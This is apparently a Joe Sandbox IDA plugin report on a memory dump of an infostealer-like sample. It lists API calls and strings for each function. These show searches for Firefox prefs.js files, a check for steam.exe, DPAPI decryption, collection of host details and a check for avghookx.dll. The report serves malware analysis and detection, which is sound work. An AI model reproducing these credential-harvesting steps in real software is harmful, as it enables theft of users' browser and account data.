Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CreateFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 1116797323-1173974218
Opcode ID: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
Instruction ID: 84c523e9d2ff6d0b2cceb644b0baa1646f1dc192954122ea0c18f52f03966360
Opcode Fuzzy Hash: 4a5b137c999928a75ba8bc4a6e6ab310dcd69db191c9960b432ed123b9b006a7
Instruction Fuzzy Hash: 6C32EC71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB86FC98F99

Function 0040D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

CopyFileA.KERNEL32(?,?,00000001,0043758C,004368AF), ref: 0040D7E8
DeleteFileA.KERNEL32(?), ref: 0040D8B3
FindNextFileA.KERNELBASE(?,?), ref: 0040D956
FindClose.KERNEL32(?), ref: 0040D96A

Strings

prefs.js, xrefs: 0040D702

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 893096357-3783873740
Opcode ID: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
Instruction ID: 927356911e44c3405f4de0d2be1bd74ddf2f7452577bbc1ac17ea627ea54bfb8
Opcode Fuzzy Hash: 41633527efff258655262d476ebd01a72874a665415db562b1b65d312d844474
Instruction Fuzzy Hash: 38A11C71D001289BCF60FB65DD46BCD7375AF04318F4101EAA808B7292DB79AEC98F99

Function 0040B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
StrCmpCA.SHLWAPI(?), ref: 0040B780

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A

FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
FindClose.KERNEL32(?), ref: 0040B8FF

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
String ID:
API String ID: 3801961486-0
Opcode ID: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
Instruction ID: de252c0fab1b0e9a2d3383b13184952b75e93cbc882370f7403094166be9312a
Opcode Fuzzy Hash: c2ed2a2b921503af2e1bda992e97388ccf911cd7dd1c3e3f35522dbd33dae0d6
Instruction Fuzzy Hash: 7E812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9

Function 004124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 004124B2
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
Process32First.KERNEL32(00000000,00000128), ref: 004124E4
Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
CloseHandle.KERNEL32(00000000), ref: 00412521

Strings

steam.exe, xrefs: 004124B7, 00412500

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: steam.exe
API String ID: 1799959500-2826358650
Opcode ID: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
Instruction ID: 012bf4d8d1ff090a25d7979138f5f9e06e77e1c880a3c2a583d4811a910fbd8f
Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15

Function 00410DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

LocalFree.KERNEL32(00000000), ref: 00410EFF

Strings

/ , xrefs: 00410E73

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54

Function 0041257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00412589
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
StrCmpCA.SHLWAPI(?), ref: 004125DC
CloseHandle.KERNEL32(00000000), ref: 004125F0

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID:
API String ID: 1799959500-0
Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25

Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

DPAPI, xrefs: 004080A9

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID: DPAPI
API String ID: 2068576380-1690256801
Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90

Function 004114A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Process32Next.KERNEL32(00000000,00000128), ref: 00411542
CloseHandle.KERNEL32(00000000), ref: 0041154D

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 907984538-0
Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69

Function 00410D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
HeapAlloc.KERNEL32(00000000), ref: 00410D50
GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
wsprintfA.USER32 ref: 00410D7D

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
Instruction ID: 3462f644bc87497e0213169472e2bde5c7d2207eb6d596ae75af8f0473202e49
Opcode Fuzzy Hash: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
Instruction Fuzzy Hash: 78F0E070A0132467EB04DFB4EC49B9B37659B04729F100295F511D71D0EB759E848785

Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34

Function 00410FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00410FD4
wsprintfA.USER32 ref: 00410FEC

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
Instruction ID: 6e5c45132ae1b45d6529ef5bd4d0c5c9796b2e2d3bf3e93bb3fd0621c026135a
Opcode Fuzzy Hash: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
Instruction Fuzzy Hash: E8E092B0D1020D9BCF04DF60EC459DE77FCEB08208F4055B5A505E3180D674AB89CF44

Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573
